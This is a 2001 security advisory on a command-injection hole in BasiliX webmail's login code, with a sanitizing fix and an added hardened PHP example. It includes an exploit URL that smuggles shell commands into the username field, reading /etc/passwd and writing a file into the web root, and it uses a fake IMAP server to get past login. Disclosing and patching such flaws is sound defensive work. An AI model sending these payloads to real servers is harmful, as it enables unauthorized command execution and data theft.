10/9/2001
BasiliX Command Execution Vulnerability (username)
Summary
BasiliX is a webmail application based on PHP and IMAP and backed by the MySQL database server. A security vulnerability in the product allows attackers to execute arbitrary commands with the privileges of the web server process.
Details
Vulnerable systems:
BasiliX version 1.0.2/3 (Series)
There is a bug in the BasiliX package that allows executing any command on the target system.
Vulnerable code:
From file login.php3:
$atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username";
...
$mkcmd = "/bin/mkdir -p $atch_dir";
@exec($mkcmd);
We can pass an evil username such as username=blah;cat%20/etc/passwd, but that alone would fail because the script first tries to connect to the IMAP server and authenticate with the supplied username and password. To get past this check we must set up a fake IMAP server or something similar; since the address and port of the IMAP server can be passed in the request, this is not a problem.
Exploit:
victim.host/basilix.php3?username=blah;echo%20"">js/blah.php&
password=blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=blah.com.pl&
bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=su.th3_tick&nocookie=1&
BSX_TestCookie=1&SESSID=1
(NOTE: The URL has been wrapped for readability)
If you do not write a fake IMAP server, you must add the username to /etc/passwd and /etc/shadow and set a password for it.
Solution:
The following is a quick fix for the 1.0.2/3 series bug (thanks to Justin Bruist).
1) Open file files/login.php (or login.php3) with your favorite editor.
2) Search for the comment line starting with "// create and or cleanup.."
3) Add the following lines above that comment, so it looks like this:
// cleanup the username to prevent running of shell commands
// on exec() call.
$username = ereg_replace("[^-A-Za-z0-9_\.]", "", $username);
// create and or cleanup attachment directory
4) Save and exit.
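As an added illustration (not code from the advisory or from BasiliX), the vulnerable command construction next to a hardened version in current PHP: ereg_replace() was removed in PHP 7, so the advisory's allow-list is written for preg_replace(), and the directory is created with mkdir() instead of handing a command line to exec(). The base path and domain value are assumed.

```php
<?php
// Added example, not BasiliX's own code.

// The advisory's allow-list, written for preg_replace()
// (ereg_replace() no longer exists in PHP 7 and later).
function sanitize_username(string $username): string
{
    return preg_replace('/[^-A-Za-z0-9_.]/', '', $username);
}

// Vulnerable pattern from login.php3: the raw username is
// interpolated into a shell command line that exec() would run.
function make_attachment_cmd_unsafe(string $base, string $domain, string $username): string
{
    $atch_dir = $base . "/" . $domain . "/" . $username;
    return "/bin/mkdir -p $atch_dir";
}

// Hardened: no shell at all. mkdir() with $recursive = true does what
// "/bin/mkdir -p" did, and a username that does not survive the
// allow-list unchanged is rejected rather than silently rewritten.
function make_attachment_dir_safe(string $base, string $domain, string $username): string
{
    $clean = sanitize_username($username);
    if ($clean === '' || $clean !== $username) {
        throw new InvalidArgumentException('username contains disallowed characters');
    }
    $atch_dir = $base . "/" . $domain . "/" . $clean;
    if (!is_dir($atch_dir) && !@mkdir($atch_dir, 0700, true)) {
        throw new RuntimeException("cannot create $atch_dir");
    }
    return $atch_dir;
}

// Constructed input modelled on the advisory's payload (assumed base
// path and domain). The unsafe builder passes the ';' and '>' straight
// through; the sanitizer strips everything outside the allow-list.
$evil = 'blah;echo "">js/blah.php';
echo make_attachment_cmd_unsafe('/var/basilix/attach', 'example.org', $evil), "\n";
echo sanitize_username($evil), "\n";
try {
    make_attachment_dir_safe('/var/basilix/attach', 'example.org', $evil);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```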
(geocities.com/ijookeren)